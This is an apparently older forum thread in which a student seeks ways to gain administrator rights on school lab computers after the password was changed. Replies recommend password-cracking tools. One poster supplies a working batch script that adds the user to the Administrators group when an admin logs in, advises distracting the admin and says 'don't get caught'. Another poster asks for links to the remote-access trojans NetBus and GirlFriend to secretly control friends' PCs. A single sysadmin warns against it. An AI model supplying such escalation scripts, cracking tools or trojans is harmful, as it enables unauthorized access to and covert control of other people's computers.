Computer Help

Hey guys, at school they just reformatted all of our computers in our lab that I spend my whole morning in. That means I lost all of my programs that I always used like AOL instant messenger and Kazaa and Winamp and stuff like that. Before we all knew the administrator password so we could install the different programs but they have since changed it. So inconsiderate of them. :)

Well, I'm wondering if they is any possible way to find what the password is or get administrator rights on my computer like I had before. All of the students here are trying to find ways to install there programs but it is not working.

Any ideas, short of interrogating the network admin?

:)

NT 4.0? Or Windows 2000?

If it's 4.0 I can send you a program off-line that I use. If it's 2000 then locate a program called "Loftcrack" on the internet. It's a Linux boot disk that can crack the password.

It is windows 2000 built on NT.

Thanks for the tip, I'll check it out.

Loftcrack is the answer then

as a network engineer and sysadmin, I will offer the warning that usually admins take a very dim view of people doing this kind of thing - like revoking all access or restricting your account to the point you have the functionality of a houseplant kind of thing.

There is a program on www.sysinternals.com that allows you to remove the Administrator password.

Or you could write a small script that looks like the following

Echo off
net localgroup Administrators /add %username%

and name it "login.bat" and save it to C:\Documents and Settings\All Users\Start Menu\Start up. Find a way to get the Admin or someone with Admin. privs to login locally to the machine you are using, and voila. You're going to want to make you can distract him/her because a cmd box will pop up momentairly...Oh yea, replace %username% with the proper username.

There are plenty of ways around it, just be creative:)

Have fun, don't get caught.

I don´t believe it that i will need this, buy I will save it , just in case, veryuseful info.

What about hacker programs ?

I will not use it to screw somebody, only for fun with friends, I used the netbus and girlfriend with sucess with win 95,98, me but with the xp , 2000 and also with me firewall programs I can´t.
And with the cable connections that always change the ip, is almost imposible (for me )

Could somebody give an update about this and a link to download ?

I really miss to open the cd, print something in my friends pc´s

There was a guy that use to work with my cousin. He use to take over my cousin computer while he was using it. He would open paint and draw ugly pictures of him while he was watching:)

Tim- should I even bother replying???

We used to remote control other machines with SMS (Systems Management Server) by Microsoft.

It had a remote control option that had a user transparent option built in.

Scott:

Microsoft, but I supose that I need to install the full program in the pc that I want to remote control, this will be not an option.

I want the old style of send an email with the server program with other program and that is all

Do somebody know about a new version and a link to download something like the netbus or girlfriend ?

Hahaha

This thread can die as far as I'm concerned. I am not going to bother anymore.
